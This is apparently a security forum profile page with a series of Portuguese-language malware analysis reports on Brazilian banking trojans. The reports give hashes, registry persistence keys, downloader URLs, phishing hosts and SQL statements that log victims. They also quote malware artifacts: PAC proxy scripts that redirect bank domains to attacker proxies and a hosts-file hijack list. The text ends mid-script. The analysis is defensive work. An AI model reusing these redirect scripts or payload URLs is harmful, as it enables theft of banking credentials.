eugui

ARIS-LD
  • Content count

    66
  • Joined

  • Last visited

Community Reputation

1 Neutral

About eugui

  • Rank
    ARIS-LD/Analista Júnior
  • Birthday 04/23/1987

Contact Methods

  • Website URL
    http://www.crimelandia.com
  • ICQ
    0
  • Skype
    guiscombatti

Profile Information

  • Sexo
    Masculino
  • Local
    São Paulo - SP

Recent Profile Visitors

305 profile views
  1. * Arquivo: Arquivo: compracasasbahia.zip Tamanho: 229376 MD5: a7a140c3e8e6638573b2d6457cd94588 Resultado Scan VirusTotal/Jotti 15/53 * Sandbox: http://anubis.iseclab.org/?action=result&task_id=1c819aacd3c399d0429da4b23d5780592&format=html *Arquivos/ chaves geradas na infecção: O4 - Startup: kfjhghueubn1.cpl.LNK = ? C:\Documents and Settings\%USER%\Application Data\kfjhghueub162430000003CEE6AEE602\kfjhghueubn1.cpl Arquivo: kfjhghueubn1.cpl Tamanho: 453120 MD5: 58694529ce894d5b3189e3f6132f0844 VT: 14/53 C:\Documents and Settings\%USER%\Application Data\kfjhghueub162430000003CEE6AEE602\kfjhghueubn2.cab Arquivo: kfjhghueubn2.cab Tamanho: 378880 MD5: 9e3a94e6abcfd6df9d8c5dea3d431ea0 C:\Documents and Settings\%USER%\Application Data\kfjhghueub162430000003CEE6AEE602\kfjhghueubn3.cab Arquivo: kfjhghueubn3.cab Tamanho: 386560 MD5: 16fd78334a4abbf10a43b4b24bb2d6f4 *Detalhes da infecção: O malware ataca o navegador Internet Explorer tentando se passar por legítimo. * Fontes/ Links para serem reportados: * Link informado http://bit.ly/1AwwZNH * Direcionamento para http://177.70.99.247/anexocompras.pdf/ * Downloader baixa executável(is) do endereço: http://177.70.99.210/arquivos/down/st9.pdf http://177.70.99.210/arquivos/up/arq2.pdf http://177.70.99.210/arquivos/up/arq3.pdf * Bankerfix: Removerá os arquivos após a próxima atualização.
  2. ja tentou no modo de segurança limpar o pendrive? ja tentou usando linux? não vai adiantar você limpar o pendrive se o seu computador estiver infectado tb
  3. * Arquivo: Arquivo: Multa-BR.Receita-Semparar.cpl Tamanho: 283648 MD5: f377b477b3c71728d889b50af9c7a4b1 Resultado Scan VirusTotal/Jotti 14 / 46 * Sandbox: http://camas.comodo....8f1694fcca1a5ac *Arquivos/ chaves geradas na infecção: O4 - HKCU\..\Run: [C:\DOCUME~1\%USER%\DEFINI~1\APPLIC~1\java.exe] C:\DOCUME~1\%USER%\DEFINI~1\APPLIC~1\java.exe C:\Documents and Settings\%USER%\Definições locais\Application Data\1A2A7838B8C8B9690W5BA6w.txt Tamanho: 0 C:\Documents and Settings\%USER%\Definições locais\Application Data\java.exe Tamanho: 4661760 MD5: 619fd8b496604e3ca76c035f2bee3253 VT: 19 / 45 C:\Documents and Settings\%USER%\Definições locais\Application Data\libmysql.dll Dll para se conectar em um banco de dados MySQL C:\Documents and Settings\%USER%\Definições locais\Application Data\miw.txt Tamanho: 1kb Conteúdo: 373D 373D 373D A7509D4AF92BD671A245E255C1 78BF61975F89F911C76081B66380B867847589AF58D4638C A7509D4AF92BD671A245E255C1 A7509D4AF92BD671A245E255C1 C:\Documents and Settings\%USER%\Definições locais\Application Data\sql.txt Tamanho: 0 *Detalhes da infecção: Faz o download de alguns arquivos. Acessa um banco de dados MySQL para consultar e inserir informações bancárias. Na primeira etapa insere o MAC do computador em uma tabela de "infectados": SHOW COLUMNS FROM bukeomersa01.cont LIKE '%' INSERT INTO bukeomersa01.cont (id,conta) VALUES (NULL,'NÚMERO-MAC-AQUI') Ao acessar o site de um banco, Bradesco por exemplo, mais um novo registro é feito no banco de dados MySQL, agora em outra tabela INSERT INTO bukeomersa01.inf (id,tipo,mc,sn,nserie,pedtab,pedtk,tab,cod,ativatab,ativatk,tk,fm) VALUES (NULL,'BRAD.wWw1:54:40','NÚMERO-MAC-AQUI',NULL,NULL,NULL,'0',NULL,NULL,'0','0',NULL,NULL) MySQL host: 187.*.***.21 user: *** pass: *** bd: *** Malware para roubar dados bancários. * Fontes/ Links para serem reportados: * Link informado http://chacuru.***.br/cp/Scripts/_vti_cnf/multas-receita.fazenda.php * Downloader baixa executável(is) do endereço: http://multifilmagemfotos.***.br/icon8.gif http://multifilmagemfotos.***.br/libmysql.gif http://www.cobalvendas.***/81.inf * Bankerfix: Removerá os arquivos após a próxima atualização. -- fim da análise --
  4. * Arquivo: Arquivo: NF-Eletronica No. 16709211 - PORTO SEGURO.COM.BR.exe Tamanho: 447657 MD5: 6eae7a2305814ed322a47ed16f26d460 Resultado Scan VirusTotal/Jotti 21 / 46 * Sandbox: http://camas.comodo....62a8a63df05350f *Arquivos/ chaves geradas na infecção: R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,AutoConfigURL = file://C:\Documents and Settings\%USER%\Application Data\tfile.jsp O4 - HKCU\..\Run: [Nota_Fiscal.exe] "C:\Documents and Settings\%USER%\Application Data\Nota_Fiscal.exe" /background C:\Documents and Settings\%USER%\Application Data\modules.exe arquivo: Nota_Fiscal.exe MD5: 2bc57d557ddf166f1e8a49094c9ca357 Tamanho: 331826 VT: 5 / 46 C:\Documents and Settings\Gui\Application Data\tfile.jsp *Detalhes da infecção: Faz acesso ao site http://hispanicachievements.org/louco/index.php para contabilizar mais uma vítima. Configura um proxy no navegador. * Fontes/ Links para serem reportados: * Link informado http://www.esracasting.fr/modules/rdf/nfe/nf.php * GET http://hispanicachievements.org/louco/index.php * Downloader baixa executável(is) do endereço: http://www.bysoul.de/images/modules.exe * Proxy hota.tudoecology.com louco.tudoecology.com * Phishing Banco do Brasil http://91.***.195.151/home/portalbb1/ Bradesco http://91.***.195.151/home/bradesco/ Caixa http://91.***.195.151/home/caixa/ Itaú http://91.***.195.151/home/30horas/ HSBC http://91.***.195.151/home/HSBC/ Sicredi http://91.***.195.151/home/sicredi/ Citibank http://91.***.195.151/home/citibank/ Serasa http://91.***.195.151/home/serasa/ * Bankerfix: Removerá os arquivos após a próxima atualização. -- fim da análise --
  5. * Arquivo: Arquivo: pedido_95689845_PDF.exe Tamanho: 313233 MD5: fdec86ecf5418295c722d5723b0a59e0 Resultado Scan VirusTotal/Jotti 8 / 46 * Sandbox: http://camas.comodo....c91f190ac8274c0 *Arquivos/ chaves geradas na infecção: R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,AutoConfigURL = file://C:\DOCUME~1\%USER%\DEFINI~1\Temp\tfile.jsp *Detalhes da infecção: Configura um proxy no navegador. Faz um GET em uma página para registro de uma nova vítima infectada. * Fontes/ Links para serem reportados: * Link informado http://www.usinadejogos.com.br/wt/pedido_95689845.PDF/pedido_95689845_PDF.zip * GET www.tobiasteka.hu/cblack.php * Proxy hota.tudoecology.com cblack.tudoecology.com * Phishing BB http://46.166.179.119/home/portalbb1/ Caixa http://46.166.179.119/home/caixa/ Bradesco http://46.166.179.119/home/bradesco/ Santander http://46.166.179.119/home/santander/ HSBC http://46.166.179.119/home/HSBC/ Citibank http://46.166.179.119/home/citibank/ Serasa http://46.166.179.119/home/serasa/ * Bankerfix: Removerá os arquivos após a próxima atualização. -- fim da análise --
  6. * Arquivo: Arquivo:Pendencias-serasa.com Tamanho:13824 MD5:a7ee68f75f0d6a17192739a40f57235f Resultado Scan VirusTotal/Jotti 5 / 46 * Sandbox: http://camas.comodo....8c4fa6b0315693f * Análise das Strings de Memória: http:// .com/ sts Software\Microsoft\Windows\CurrentVersion\Internet Settings\ AutoConfigURL file:// systemfiletemp firefox \i826.js \Mozilla\Firefox\Profiles\ \prefs.js user_pref( network.proxy.type http://bur***.net/modules/mod_archive/help.php http://abetasummit.com.br/novo/***/%20/wp-env.php?nomepc= \texto.txt &osName= &ipp= foi PROXY .\x63\x6fm:80 function FindProxyForURL( url, host ) var turnON = " var bra1 = "*b\x62*"; var bra2 = "*ban\x63\x6f\x64\x6fbras\x69\x6c*"; if (shExpMatch(host, bra1)) { return turnON; *Arquivos/ chaves geradas na infecção: C:\i826.js Tamanho: 0 C:\WINDOWS\system32\chrome.com Arquivo: chrome.com Tamanho: 24064 MD5: ee6fdb5b3d94984e70d1251c3318bd4e VT: 1/35 *Detalhes da infecção: altera o arquivo de hosts e tenta criar um arquivo .js como proxy, mas este arquivo fica com tamanho 0. * Fontes/ Links para serem reportados: * Link informado http://abetasummit.c... /pendencia.php * Direcionamento para http://bur***.net/mo...cias-serasa.com * Downloader baixa executável(is) do endereço: http://abetasummit.c...tramposussa.exe http://tu****nux.com/main.php http://tu****nux.com/h856 http://bur***.net/mo...rchive/help.php http://abetasummit.c...**/ /wp-env.php * Hosts 192.**.50.** bb.com.br 192.**.50.** www.bb.com.br 192.**.50.** www.bancodobrasil.com.br 192.**.50.** bancodobrasil.com.br 192.**.50.** www.americanexpress.com.br 192.**.50.** americanexpress.com.br 192.**.50.** www.americanexpress.com 192.**.50.** americanexpress.com 192.**.50.** www.credicard.com.br 192.**.50.** www.credicard.com 192.**.50.** credicard.com.br 192.**.50.** credicard.com 192.**.50.** www.caixa.com.br 192.**.50.** www.caixa.com 192.**.50.** caixa.com.br 192.**.50.** caixa.com 192.**.50.** www.caixa.gov.br 192.**.50.** caixa.gov.br 192.**.50.** www.caixaeconomica.com.br 192.**.50.** caixaeconomica.com.br 192.**.50.** www.caixaeconomica.gov.br 192.**.50.** caixaeconomica.gov.br 192.**.50.** www.caixaeconomicafederal.gov.br 192.**.50.** caixaeconomicafederal.gov.br 192.**.50.** www.cef.com.br 192.**.50.** cef.com.br 192.**.50.** www.cef.gov.br 192.**.50.** cef.gov.br 192.**.50.** www.bradesco.com.br 192.**.50.** bradesco.com.br 192.**.50.** www.bradescoprime.com.br 192.**.50.** bradescoprime.com.br 192.**.50.** www.prime.com.br 192.**.50.** prime.com.br 192.**.50.** bradesco.com 192.**.50.** www.bradesco.com 192.**.50.** www.bradescopj.com.br 192.**.50.** bradescopj.com.br 192.**.50.** www.bancoreal.com.br 192.**.50.** bancoreal.com.br 192.**.50.** www.real.com.br 192.**.50.** real.com.br 192.**.50.** www.santander.com.br 192.**.50.** santander.com.br 192.**.50.** www.banespa.com.br 192.**.50.** banespa.com.br 192.**.50.** www.santanderempresarial.com.br 192.**.50.** santanderempresarial.com.br 192.**.50.** santandernet.com.br 192.**.50.** www.santandernet.com.br 192.**.50.** www.banrisul.com.br 192.**.50.** banrisul.com.br 192.**.50.** www.banrisul.com 192.**.50.** banrisul.com 192.**.50.** sicredi.com.br 192.**.50.** www.sicredi.com.br 192.**.50.** cetelem.com.br 192.**.50.** www.cetelem.com.br 192.**.50.** itau.com.br 192.**.50.** www.itau.com.br 192.**.50.** itaupersonnalite.com.br 192.**.50.** www.itaupersonnalite.com.br 192.**.50.** hsbc.com.br 192.**.50.** www.hsbc.com.br 192.**.50.** hsbcpremier.com.br 192.**.50.** www.hsbcpremier.com.br 192.**.50.** www.banese.com.br 192.**.50.** banese.com.br 192.**.50.** safra.com.br 192.**.50.** www.safra.com.br 192.**.50.** www.cetelem.com.br 192.**.50.** cetelem.com.br * Bankerfix: Removerá os arquivos após a próxima atualização. -- fim da análise --
  7. * Arquivo: Arquivo:NF-Eletronica 488762122 - Porto Seguro.com.exe Tamanho:10395 MD5:288b363c4fab738a2fc971d88758472d Resultado Scan VirusTotal/Jotti 23 / 45 * Sandbox: Comodo *Arquivos/ chaves geradas na infecção: R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,AutoConfigURL = http://**.arquivos-pdf.**/uploads/conf.jsp'>http://**.arquivos-pdf.**/uploads/conf.jsp O4 - HKCU\..\Run: [Windows Live Messenger] "C:\Documents and Settings\%USER%\Application Data\MwsSFwMjrEUKWbyWmRA.exe" C:\Documents and Settings\%USER%\Application Data\MwsSFwMjrEUKWbyWmRA.exe é o arquivo "NF-Eletronica 488762122 - Porto Seguro.com.exe". *Detalhes da infecção: Faz um GET no endereço http://**.arquivos-pdf.**/uploads/download.php'>http://**.arquivos-pdf.**/uploads/download.php, provavelmente para registro de vitimas, porque redireciona para a página do google. Configura um proxy no navegador: http://**.arquivos-pdf.**/uploads/conf.jsp'>http://**.arquivos-pdf.**/uploads/conf.jsp * Fontes/ Links para serem reportados: * Link informado http://www.tax-perfect.**/components/com_jce/seguro/nf.** * GET http://**.arquivos-pdf.**/uploads/download.php'>http://**.arquivos-pdf.**/uploads/download.php * PROXY http://**.arquivos-pdf.**/uploads/conf.jsp'>http://**.arquivos-pdf.**/uploads/conf.jsp hotmail http://**.arquivos-pdf.**/home/login/ serasa http://**.arquivos-pdf.**/home/serasa/ hsbc http://**.arquivos-pdf.**/home/hsbc/ banese http://**.arquivos-pdf.**/home/banese/ bradesco http://**.arquivos-pdf.**/home/internetbanking/ bb http://**.arquivos-pdf.**/home/portalbb2/ caixa http://**.arquivos-pdf.**/home/acesso/ sicredi http://**.arquivos-pdf.**/home/sic/ pagseguro http://**.arquivos-pdf.**/home/pagseguro/ bnb http://**.arquivos-pdf.**/Home/Conteudo/ * Bankerfix: Removerá os arquivos após a próxima atualização. -- fim da análise --
  8. * Arquivo: Arquivo: correcao.cpf.exe Tamanho: 30208 MD5: 5429aed044298127686b8b0894c9b92a Resultado Scan VirusTotal/Jotti 2 / 42 * Sandbox: http://camas.comodo....bae0f974954c205 *Arquivos/ chaves geradas na infecção: O4 - HKCU\..\Run: [winlogon] C:\Documents and Settings\%USUARIO%\Application Data\srvsms\wgastart.exe C:\Documents and Settings\%USUARIO%\Application Data\srvsms\wgastart.exe Arquivo: wgastart.exe Tamanho: 18432 MD5: 8d29f8054c4c4fe6d5d2067203536d0b VT: 2 / 44 C:\Documents and Settings\%USUARIO%\Application Data\srvsms\winuac.exe Arquivo: winuac.exe Tamanho: 1965568 MD5: d2d04f890c7597732955a62868366c09 VT: 1 / 44 *Detalhes da infecção: É um ransomware que solicita um resgate para "liberar" o computador. Matéria no LD: http://www.linhadefensiva.org/2012/11/praga-brasileira-sequestra-navegador-e-vende-windows-original/ Este arquivo não é o mesmo apresentado na matéria acima, mas tem a mesma funcionalidade, a diferença é que os dados solicitados não são enviados via POST e sim gravados em um banco de dados. Banco de dados: Host: dbsq0007.whservidor.com Login: *** Senha: *** Faz acesso ao endereço http://ip2country.sourceforge.net/ip2c.php?format=XML para pegar informações da conexão do usuário e salvar no banco de dados também. * Fontes/ Links para serem reportados: * Link informado h**p://bluemidi.**/serasa/correcao_cpf/correcao.cpf.rar * Downloader baixa executável(is) do endereço: h**p://www.limperonline.com.**/RWLD/cc/exe4.exe h**p://www.limperonline.com.**/RWLD/cc/start1.exe * Bankerfix: Arquivos serão removidos na próxima atualização.
  9. * Arquivo: Arquivo: NF.DSC903.cpl Tamanho: 209408 MD5: 2b61b3ccca2e24a07206d7110aff057f Resultado Scan VirusTotal/Jotti 18 / 42 *Arquivos/ chaves geradas na infecção: R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,AutoConfigURL = h**p://www.swaminarayangurukul.**/gurukul/images/sampledata/parks/animals/180px_wobbegong.pac C:\ProgramData\ift.txt Conteúdo: Windows *Detalhes da infecção: Faz um POST para notificar o criminosos sobre mais uma vítima. Configura um proxy no navegador * Fontes/ Links para serem reportados: * Link informado h**p://dipesulveiculos.com.**/layout.php * Direcionamento para h**p://dipesulveiculos.com.**/NF.DSC903.gz * Proxy h**p://www.swaminarayangurukul.**/gurukul/images/sampledata/parks/animals/180px_wobbegong.pac * POST h**p://swaminarayangurukul.**/gurukul/images/mag/email.php * Phishing Proxy: 19*.58.102.** Bradesco h**p://19*.58.102.**/ibpflogin/ Itaú h**p://19*.58.102.**/GRIPNETbklcom.dll/ BRB h**p://19*.58.102.**/brbnet/iBanking/ HSBC h**p://19*.58.102.**/para-voce/
  10. E-mail falso envolvendo o Serasa Título do e-mail: Segue abaixo cópia do cheque Protestado Mensagem: Prezado Cliente (a) Segue abaixo cópia do cheque Protestado 1 anexo(s) | Visualizar (355,0 KB) 2012 Serasa Experian. Todos os direitos reservados. * Arquivo: Arquivo: Cheque-Protestado.cpl Tamanho: 396800 MD5: c04428e12f70c87a2218a5cdeb5f448b Resultado Scan VirusTotal/Jotti 12 / 44 * Sandbox: http://camas.comodo....42793ece9d60d66 *Arquivos/ chaves geradas na infecção: O2 - BHO: (no name) - {79E44F87-6A0A-413A-A21E-EDBAEBD79089} - C:\WINDOWS\nill.dll C:\WINDOWS\iexplorer.dll Arquivo: iexplorer.dll MD5: ce69c367cbea4888722561e368ee3a27 Tamanho: 2687488 VT: 10/44 C:\WINDOWS\nill.dll Arquivo: nill.dll MD5: ff6c21c04ab8a270d1c5259019fb7b51 Tamanho: 2848256 VT: 2 / 43 C:\WINDOWS\registraiexplorer.bat @echo off regsvr32 /s inadd.dll C:\WINDOWS\registranil.bat @echo off regsvr32 /s nill.dll C:\WINDOWS\smal.ini domingo, 28 de Outubro de 2012 21:50:07 *Detalhes da infecção: Faz download de vários arquivos (dll e bat) Faz um POST para informar o criminoso que uma nova vítima caiu no golpe. Por fim abre o navegador de internet no endereço: http:///e,/root,%22C:/Temp%22 * Fontes/ Links para serem reportados: * Link informado h**p://ow.ly/eIhfM * Direcionamento para h**p://oticaspeed.**.br/Protesto/ h**p://oticaspeed.**.br/Protesto/Protesto.html h**p://wavenet.**.br/Cheque-Protestado.zip * Downloader baixa executável(is) do endereço: h**p://mecflui.**.br/nill.dll h**p://mecflui.**.br/registranil.bat h**p://mecflui.**.br/iexplorer.dll h**p://mecflui.**.br/registraiexplorer.bat h**p://mecflui.**.br/inadd.dll * POST h**p://www.adjugimmo.**/atendimento.php (to = forever.vipe.2013@gmail.com & subject = (+cliente) & message = domingo, 28 de Outubro de 2012 21: 50: 07) * Bankerfix: Remeveu apenas: C:\WINDOWS\iexplorer.dll Arquivos serão removidos na próxima atualização. -- fim da análise --
  11. Imagem do golpe que está sendo enviado por e-mail: * Arquivo: Arquivo: reportagem-g1.com Tamanho: 15872 MD5: a07aaa86c27721478afaf47d0d0174ec Resultado Scan VirusTotal/Jotti 1 / 41 * Sandbox: http://camas.comodo....b62061e0be1ff0c *Arquivos/ chaves geradas na infecção: R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,AutoConfigURL = h**p://norte.uni.edu.***/wp-content/uploads/images/jquery-min-b.jsp *Detalhes da infecção: Configura um proxy no navegador: h**p://norte.uni.edu.**wp-content/uploads/images/jquery-min-b.jsp * Fontes/ Links para serem reportados: * Link informado h**p://www.grownups55plus.***/img/portalg1.php * Direcionamento para h**p://yoghurtmedia.co.**/dataapp/reportagem-g1.com * Proxy: h**p://query.morumbi.us * Phishing Hotmail / MSN / LIVE h**p://query.morumbi.us/***/login/ Itaú h**p://query.morumbi.us/**/30horas/ Serasa h**p://query.morumbi.us/***/serasa/ Santander h**p://query.morumbi.us/***/sportal/ HSBC h**p://query.morumbi.us/***/hsbc/ AmericanExpress h**p://query.morumbi.us/***/amex/ Banese h**p://query.morumbi.us/***/banese/ Bradesco h**p://query.morumbi.us/***/internetbanking/ Banco do Brasil h**p://query.morumbi.us/***/portalbb2/ Caixa h**p://query.morumbi.us/***/acesso/ Sicredi h**p://query.morumbi.us/***/sic/ PagSeguro h**p://query.morumbi.us/***/pagseguro/ Citibank h**p://query.morumbi.us/***/citi/ GOL h**p://query.morumbi.us/***/voegol/ * Bankerfix: Proxy já reportado
  12. Mensagem enviada por SMS: "Postei uma foto sua no site ---.reportsuzano.com quando ver me responde bjs..." * Arquivo: Arquivo: Foto.exe Tamanho: 152277 MD5: 59ba91b882df31d21126fa8c31a34584 Resultado Scan VirusTotal/Jotti 20 / 43 *Arquivos/ chaves geradas na infecção: O2 - BHO: G-Buster Browser Defense CEF - {C41A1C0E-EA6C-11D4-B1B8-444553540003} - C:\Programas\GbPlugin\gbiehcef.dll O4 - HKLM\..\Run: [WGer] C:\$Recicle$\exiploris.exe O4 - HKLM\..\Run: [MnsMessenger] C:\WINDOWS\system32\msnmsg.exe O4 - HKLM\..\Run: [DefencerGBA] C:\$Recicle$\Defencer2011.exe O4 - HKLM\..\Run: [HOUOIERFWWER.exe] C:\$Recicle$\HOUOIERFWWER.exe O4 - HKLM\..\Run: [iigoogleeiSvchost.exe] C:\$Recicle$\iSvchost.exe O4 - HKLM\..\RunOnce: [Cleanup] C:\cleanup.exe O4 - HKCU\..\Run: [wininitst] "C:\$Recicle$\Santa.exe" O4 - HKCU\..\Run: [WGm] "C:\$Recicle$\GMDKSAKJDL.exe" O4 - HKCU\..\Run: [QEREFGHGFHD.exe] C:\$Recicle$\QEREFGHGFHD.exe C:\WINDOWS\system32\msnmsg.exe Arquivo: msnmsg.exe Tamanho: 503296 MD5: 78986f31554dd3e8170ecbafd4c3292b VT: 21 / 43 C:\$Recicle$\AVS.exe Arquivo:AVS.exe Tamanho: 332800 MD5: 570469dbc78eba9d96bb0f5207c75a4c VT: 19 / 43 C:\$Recicle$\cflnk.dll Arquivo:cflnk.dll Tamanho: 44 MD5: b6069fafff94be40a877b45125d88295 VT: 0 / 43 C:\$Recicle$\confx.dll Arquivo: confx.dll Tamanho: 142 MD5: 6eaa8d9cba08110d742a478d475d5254 VT: 0 / 43 C:\$Recicle$\Defencer2011.exe Arquivo: Defencer2011.exe Tamanho: 1135616 MD5: e730c1f158b481f420492920b2f34c91 VT: 16 / 43 C:\$Recicle$\exiploris.exe Arquivo: exiploris.exe Tamanho: 245760 MD5: d832e6049c80bc832b50258bdbf97cb2 VT: 17 / 42 C:\$Recicle$\GB.exe Arquivo: GB.exe Tamanho: 4632064 MD5: 098644dd89300e8c11817ca895276820 VT: 8 / 43 C:\$Recicle$\GMDKSAKJDL.exe Arquivo: GMDKSAKJDL.exe Tamanho: 364032 MD5: 9950c44ea27fbad9554fd2bb67e55089 VT: 8 / 43 C:\$Recicle$\HOUOIERFWWER.exe Arquivo: HOUOIERFWWER.exe Tamanho: 831488 MD5: be380da3df5b5faf934ecd37aeb3d430 VT: 9 / 42 C:\$Recicle$\msnmsg.exe mesmo arquivo do: C:\WINDOWS\system32\msnmsg.exe C:\$Recicle$\ipgt.exe Arquivo: ipgt.exe Tamanho: 353280 MD5: 98400d3a392021cee751b42a6f84d08e VT: 13 / 43 C:\$Recicle$\iSvchost.exe Arquivo: iSvchost.exe Tamanho: 2507264 MD5: 8da5c651b2ff38407c56656948b4f5fc VT: 3 / 29 C:\$Recicle$\Santa.exe Arquivo: Santa.exe Tamanho: 559616 MD5: 7c1adab4c4eadb9aa026cb9e8634e078 VT: 13 / 43 C:\$Recicle$\QEREFGHGFHD.exe Arquivo: QEREFGHGFHD.exe Tamanho: 817664 MD5: 431b188ce5f0dfe18c9192ef617af07e VT: 12 / 42 C:\GbPlugin\Cef\Cef.gdt Arquivo: Cef.gdt Tamanho: 86 MD5: 7c1adab4c4eadb9aa026cb9e8634e078 VT: 0 / 43 C:\cleanup.exe Arquivo: cleanup.exe Tamanho: 19286 MD5: d5816bddd4382975c1693cce68547fcc VT: 15 / 43 C:\zip.exe Arquivo: zip.exe Tamanho: 135168 MD5: db9b1cc34b35136f35e333de520c15f5 VT: 1 / 43 C:\cleanup.bat @ECHO OFF cd %systemdrive%\ if exist %systemdrive%\avenger\backup.zip move /y %systemdrive%\avenger\backup.zip "%systemdrive%\avenger\backup-%date:/=.%-%time::=.%.zip" move /y backup.reg %systemdrive%\avenger\ copy /y avenger.txt %systemdrive%\avenger\ for %%a in (c d e f g h i j k l m n o p q r s t u v w x y z) do if exist %%a:\avenger attrib -r -h -s %%a:\avenger\* /S /D & zip -r -S -q -m -! -P infected "%systemdrive%\avenger\backup.zip" %%a:\avenger\* -x %systemdrive%\avenger\backup*.zip & rmdir %%a:\avenger del zip.exe del cleanup.exe del cleanup.bat *Detalhes da infecção: Ao executar o malware, uma imagem JPG é exibida e vários downloads são efetuados. Processos que ficam em execução abaixo do exiploris.exe: msnmsg.exe Defencer2011.exe GMDKSAKJDL.exe Processo exiploris.exe fica a todo momento fazendo requisições ao endereço: http://---.reportsuz....php?op=PegaArq * Fontes/ Links para serem reportados: * Link informado http://reportsuzano.com/Foto.rar * Downloader baixa executável(is) do endereço: http://---.reportsuzano.---/MiscDoc/winger.doc http://---.reportsuzano.---/ind.php?op=PegaLnk http://---.reportsuzano.---/ind.php?op=PegaServ http://---.reportsuzano.---/ind.php?op=PegaArq http://---.reportsuzano.---/Musicas/GB.mp3 http://---.reportsuzano.---/Musicas/ipgt.mp3 http://---.reportsuzano.---/Musicas/msnmsg.mp3 http://---.reportsuzano.---/Musicas/Defencer2011.mp3 http://---.reportsuzano.---/Musicas/Santa.mp3 http://---.reportsuzano.---/Musicas/GMDKSAKJDL.mp3 http://---.reportsuzano.---/Musicas/HOUOIERFWWER.mp3 http://---.reportsuzano.---/Musicas/QEREFGHGFHD.mp3 http://---.reportsuzano.---/Musicas/AVS.mp3 http://---.reportsuzano.---/Musicas/iSvchost.mp3 * Bankerfix: Arquivos serão removidos na próxima atualização.
  13. * Arquivo: Arquivo: arquivo.scr Tamanho: 618496 MD5: 418c2d329c35ddad3c28784c6a5bc7cf Resultado Scan VirusTotal/Jotti 31 / 42 * Sandbox: http://anubis.isecla...a6e&format=html *Arquivos/ chaves geradas na infecção: C:\kkrr.exe Arquivo: kkrr.exe Tamanho: 1023 MD5: f545efdf2e6d6c0eb3bce3259ec2f42e VT: 0 / 41 C:\krr.exe Arquivo: krr.exe Tamanho: 1023 MD5: f545efdf2e6d6c0eb3bce3259ec2f42e VT: 0 / 42 *Detalhes da infecção: O malware tenta baixar dois arquivos: hxxp://gexxma.com.br/fbclone/pt-age1.exe hxxp://gexxma.com.br/fbclone/pt-age2.exe e como são arquivos inexistentes, o conteúdo dos dois arquivos .exe criados no diretório C:\ acabou sendo o código html abaixo: <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <title>Object not found!</title> <link rev="made" href="mailto:webmaster@gexxma.com.br" /> <style type="text/css"><!--/*--><![CDATA[/*><!--*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address {margin-left: 3em;} span {font-size: smaller;} /*]]>*/--></style> </head> <body> <h1>Object not found!</h1> <p> The requested URL was not found on this server. If you entered the URL manually please check your spelling and try again. </p> <p> If you think this is a server error, please contact the <a href="mailto:webmaster@gexxma.com.br">webmaster</a>. </p> <h2>Error 404</h2> <address> <a href="/">gexxma.com.br</a><br /> <span>Sun Sep 16 13:56:17 2012<br /> Apache</span> </address> </body> </html> Isso quer dizer que o malware iria pegar o conteúdo desses dois arquivos .exe do site "gexxma.com.br" e jogar como código dos dois arquivos criados no diretório C:\. * Fontes/ Links para serem reportados: * Link informado https://docs.google....S0tVTG0yaVJreTA * Direcionamento para * Downloader baixa executável(is) do endereço: hxxp://gexxma.com.br/fbclone/pt-age1.exe (arquivo inexistente) hxxp://gexxma.com.br/fbclone/pt-age2.exe (arquivo inexistente) * Bankerfix: Arquivos serão removidos na próxima atualização. -- fim da análise --
  14. * Arquivo: Arquivo: MLsf-Boleto639937192012-PDF-.com Tamanho: 158727 MD5: 5b9bbce6bf55254470a5f61da02c835c Resultado Scan VirusTotal/Jotti 32 / 42 * Sandbox: http://camas.comodo.com/cgi-bin/submit?file=7a721a2f2abe7c1ae6aa758c9814b5f89853aecc5c04a63612cd987c78e3d718 *Detalhes da infecção: O malware tenta baixar 3 arquivos, mas o site está offline. hxxp://www.3dpalms.net.br/htp.txt hxxp://www.3dpalms.net.br/modulo.txt hxxp://www.3dpalms.net.br/mshot.txt * Fontes/ Links para serem reportados: * Link informado http://www.pragma-scientific.it/language/pdf_fonts/Pdf-dwnld.php * Direcionamento para hxxp://www.anewwomanestetica.xx.br/xx/index.php * Downloader baixa executável(is) do endereço: hxxp://www.3dpalms.net.br/htp.txt (site offline) hxxp://www.3dpalms.net.br/modulo.txt (site offline) hxxp://www.3dpalms.net.br/mshot.txt (site offline) -- fim da análise --
  15. * Arquivo: Arquivo: Intimacao2004835992.com Tamanho: 123183 MD5: 1165df9bb662e6a24501dba41bf29dc0 Resultado Scan VirusTotal/Jotti 23 / 41 * Sandbox: http://camas.comodo....f917d9a4a56d1d6 *Arquivos/ chaves geradas na infecção: R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,AutoConfigURL = file://C:\DOCUME~1\%USUARIO%\DEFINI~1\Temp/%NOME_COMPUTADOR%.txt C:\Documents and Settings\%USUARIO%\Definições locais\Temp\ok.db Tamanho: 1k não tem nada C:\Documents and Settings\%USUARIO%\Definições locais\Temp\plugins.exe Arquivo: plugins.exe MD5: 9c4d7bbff3d3500b50c09ed6805ba402 Tamanho: 23552 VT: 18 / 42 C:\Documents and Settings\%USUARIO%\Definições locais\Temp\MEUPC.txt Arquivo proxy function FindProxyForURL(url, host) { var ip = 'PROXY mim.xxx.eu:80'; var hot = 'PROXY mim.xxx.eu:80'; var bb1 = '*bb*'; var bb2 = '*bancodobrasil*'; if (shExpMatch(host, bb1)) { return ip; }; if (shExpMatch(host, bb2)) { return ip; }; var ban1 = '*banese*'; if (shExpMatch(host, ban1)) { return ip; }; var cef1 = '*cef*'; var cef2 = '*caixa*'; if (shExpMatch(host, cef1)) { return ip; }; if (shExpMatch(host, cef2)) { return ip; }; var desco1 = '*bradesco*'; if (shExpMatch(host, desco1)) { return ip; }; var hsbc1 = '*hsbc*'; if (shExpMatch(host, hsbc1)) { return ip; }; var hot1 = '*hotmail*'; if (shExpMatch(host, hot1)) { return hot; }; var santa1 = '*santander*'; var santa2 = '*real*'; var santa3 = '*banespa*'; if (shExpMatch(host, santa1)) { return ip; }; if (shExpMatch(host, santa2)) 